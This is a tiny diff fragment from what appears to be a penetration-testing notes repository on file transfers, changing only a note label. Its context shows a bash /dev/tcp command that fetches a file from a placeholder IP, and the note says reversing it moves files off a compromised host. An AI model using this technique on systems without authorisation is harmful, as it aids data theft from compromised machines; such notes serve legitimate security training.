Roothulhu/Pwnomicon/docs/04-file-transfers.md

 cat < /dev/tcp/<IP>/443 > <OUTPUT FILE>
 ```

-> **Note:** This method can also be used to transfer files from the compromised host to your Source Machine by reversing the direction of the connection.
+> **NOTE:**  This method can also be used to transfer files from the compromised host to your Source Machine by reversing the direction of the connection.

 </details>
 </details>